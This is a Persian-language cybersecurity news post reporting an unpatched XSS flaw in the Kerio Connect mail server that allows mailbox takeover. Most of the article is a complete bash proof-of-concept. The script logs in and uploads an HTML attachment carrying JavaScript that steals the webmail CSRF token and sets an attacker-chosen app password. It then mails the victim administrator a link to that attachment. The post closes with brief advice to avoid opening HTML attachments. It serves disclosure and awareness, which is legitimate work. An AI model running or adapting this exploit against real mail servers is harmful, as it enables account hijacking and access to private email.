Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آسیب پذیری امنیتی
  • اخبار

آسیب پذیری XSS در KerioConnect + کد POC

On فروردین 30, 1402فروردین 30, 1402
seyyid
Share
زمان مطالعه: 2 دقیقه

محققین امنیتی یه آسیب پذیری XSS در KerioConnect کشف کردن که امکان تصاحب اکانت میل باکس قربانی رو برای مهاجم فراهم میکنه.

KerioConnect محصول کمپانی GFI ، یه میل سرور سازمانی هستش که توسط 30 هزار شرکت در سراسر جهان استفاده میشه. برای پلتفرم های ویندوز ، لینوکس ، مک قابل نصب و استفاده هستش . اغلب توسط کسب و کارهای کوچیک مورد استفاده قرار میگیره ، چون نصب و پیکربندی و استفاده ساده ای داره و هزینه اش در برابر محصولات مشابه خیلی اقتصادیه.

آسیب پذیری در فرایند پردازش ضمیمه های HTML هستش که هکر میتونه با ارسال یه فایل HTML که توش کد جاوااسکریپت مخرب وجود داره، این آسیب پذیری رو اکسپلویت کنه و کنترل کامل میل باکس بدست بگیره.

 

 

در زیر POC برای این آسیب پذیری رو مشاهده میکنید :

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/bin/bash
 
# SETUP
url="http://192.168.206.1:8800"
username="aaaa"
password="734d51Mc6"
domain="0wn.lt"
victim="admin@$domain"
 
# LOGIN
echo "LOGGING IN..."
data="kerio_username=$username&kerio_password=$password"
response=$(curl -i -s -k -X POST \
    -H "Host: $url" \
    -H "Cache-Control: max-age=0" \
    -H "Upgrade-Insecure-Requests: 1" \
    -H "Origin: $url" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36" \
    -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" \
    -H "Referer: $url/webmail/login/" \
    -H "Accept-Encoding: gzip, deflate" \
    -H "Accept-Language: en-US,en;q=0.9" \
    -H "Connection: close" \
    --data-binary "$data" \
    -D - \
    "$url/webmail/login/dologin")
 
cookies=$(echo "$response" | grep "^Set-Cookie:" | awk '{print $2}' | sort -u)
csrftoken=$(echo "$cookies" | grep "TOKEN_CONNECT_WEBMAIL" | awk -F ';' '{print $1}' | awk -F '=' '{print $2}')
echo "COOKIES ARE... $cookies"
 
# UPLOAD THE FILE
echo "UPLOADING FILE..."
response2=$(curl -i -s -k -X $'POST' \
    -H $'Host: $url'  -H $'Accept: application/json-rpc' -H "X-Token: $csrftoken" -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Description: =?UTF-8?Q?kerio.html?=' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36' -H $'Content-Type: text/html' -H "$url" -H "Referer: $url/webmail/" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
    -b "$cookies" \
  --data-binary $'<script>\x0d\x0a  function displayResponse() {\x0d\x0a    \x0d\x0a    var cookieValue = null;\x0d\x0a\x0d\x0a    // Get the value of the TOKEN_CONNECT_WEBMAIL cookie\x0d\x0a    var cookieName = \"TOKEN_CONNECT_WEBMAIL=\";\x0d\x0a    var cookieArray = document.cookie.split(\';\');\x0d\x0a\x0d\x0a    for(var i = 0; i < cookieArray.length; i++) {\x0d\x0a      var cookie = cookieArray[i];\x0d\x0a      while (cookie.charAt(0) == \' \') {\x0d\x0a        cookie = cookie.substring(1);\x0d\x0a      }\x0d\x0a      if (cookie.indexOf(cookieName) == 0) {\x0d\x0a        cookieValue = cookie.substring(cookieName.length, cookie.length);\x0d\x0a      }\x0d\x0a    }\x0d\x0a    \x0d\x0a    // Perform CSRF using stolen Cookies\x0d\x0a    fetch(\'/webmail/api/jsonrpc/\', {\x0d\x0a      method: \'POST\',\x0d\x0a      headers: {\x0d\x0a        \'Content-Type\': \'text/plain\',\x0d\x0a        \'X-Token\': cookieValue,\x0d\x0a        \'Connection\': \'close\',\x0d\x0a      },\x0d\x0a      body: JSON.stringify({\x0d\x0a        \"jsonrpc\":\"2.0\",\x0d\x0a    \"id\":17,\x0d\x0a    \"method\":\"Session.setAppPasswords\",\x0d\x0a    \"params\":{\"appPasswords\":[{\"description\":\"ezpass\",\"password\":\"ezpassword\",\"creationDate\":0}]}\x0d\x0a  }),\x0d\x0a    })\x0d\x0a      .then(response => {\x0d\x0a        return response.text();\x0d\x0a      })\x0d\x0a      .then(responseText => {\x0d\x0a        alert(responseText);\x0d\x0a      })\x0d\x0a      .catch(error => {\x0d\x0a        alert(error);\x0d\x0a      });\x0d\x0a\x0d\x0a    return false;\x0d\x0a  }\x0d\x0a\x0d\x0a  window.onload = displayResponse;\x0d\x0a</script>\x0d\x0a' \
    "$url/webmail/api/jsonrpc/attachment-upload")
 
file_id=$(echo $response2 | awk -F'"id":' '{print $3}' | awk -F',' '{print $1}')
file_name=$(echo $response2 | awk -F'"name":' '{print $2}' | awk -F',' '{print $1}')
file_url="$url/webmail/api/download/tmp/$file_id/file_name"
file_url=$(echo "$file_url" | tr -d '"')
 
# SEND THE MESSAGE
echo "SENDING MESSAGE..."
curl -s -k -X $'POST' \
    -H $'Host: $url'  -H $'X-Requested-With: XMLHttpRequest' -H "X-Token: $csrftoken" -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36' -H $'Content-Type: application/json' -H $'Accept: */*' -H "Origin: $url" -H "Referer: $url/webmail/" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: open' \
    -b "$cookies" \
  --data-binary "{\"jsonrpc\":\"2.0\",\"id\":21,\"method\":\"Mails.create\",\"params\":{\"mails\":[{\"send\":true,\"showExternal\":false,\"subject\":\"XSS Message\",\"notificationTo\":{},\"isMDNSent\":true,\"requestDSN\":false,\"from\":{\"address\":\"$username@0wn\",\"name\":\"aaa\"},\"sender\":{},\"encrypt\":false,\"sign\":false,\"priority\":\"Normal\",\"isAnswered\":false,\"isForwarded\":false,\"isJunk\":false,\"isFlagged\":false,\"isSeen\":true,\"isDraft\":true,\"isReadOnly\":false,\"attachments\":[],\"headers\":[],\"displayableParts\":[{\"contentType\":\"ctTextHtml\",\"content\":\"<html><head></head><body><a href=\\\""$file_url\\\"" title=\\\"Click to open the message\\\" target=\\\"_blank\\\" style=\\\"box-sizing: content-box; font-size: 48px;\\\">Click to open the message</a></body></html>\"}],\"bcc\":[],\"cc\":[],\"to\":[{\"name\":\"Administrator\",\"address\":\"admin@$domain\",\"contactId\":\"\"}],\"replyTo\":[]}]}}" \
    "$url/webmail/api/jsonrpc/"
 
echo "DONE! Check victim inbox..."

 

 

نکته ای که هستش اینه که این آسیب پذیری 17 ژانویه 2023 ، 17 دی 1401، به فروشنده گزارش شده اما گویا فروشنده توجهی به گزارش نکرده. بنابراین اگه از این محصول استفاده میکنید، از باز کردن ضمائم بصورت فایل html خودداری کنید.

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی اخبارIn KerioConnect , XSS

راهبری نوشته

بهترین محققین مایکروسافت برای سه ماهه اول 2023
بدافزار اندرویدی با 60 برنامه آلوده و 100 میلیون نصب

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • اخبار
seyyid
On فروردین 19, 1402فروردین 28, 1402

بروزرسانی اندروید برای ماه آوریل با اصلاح 65 آسیب پذیری

  • اخبار
  • بازیگران تهدید
seyyid
On فروردین 7, 1402فروردین 28, 1402

تله آژانس جرایم ملی بریتانیا برای مجرمین سایبری

  • آسیب پذیری امنیتی
  • اخبار
  • امنیت وب
  • انتشارات
  • باگ بانتی
  • پروژه ها
  • ماشین آسیب پذیر
seyyid
On آذر 13, 1402

نسخه وردپرس آسیب پذیر برای نوامبر 2023 منتشر شد

  • آسیب پذیری امنیتی
  • اخبار
  • بازیگران تهدید
seyyid
On مهر 30, 1402

آسیب پذیری زیرودی جدید در Cisco IOS XE

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404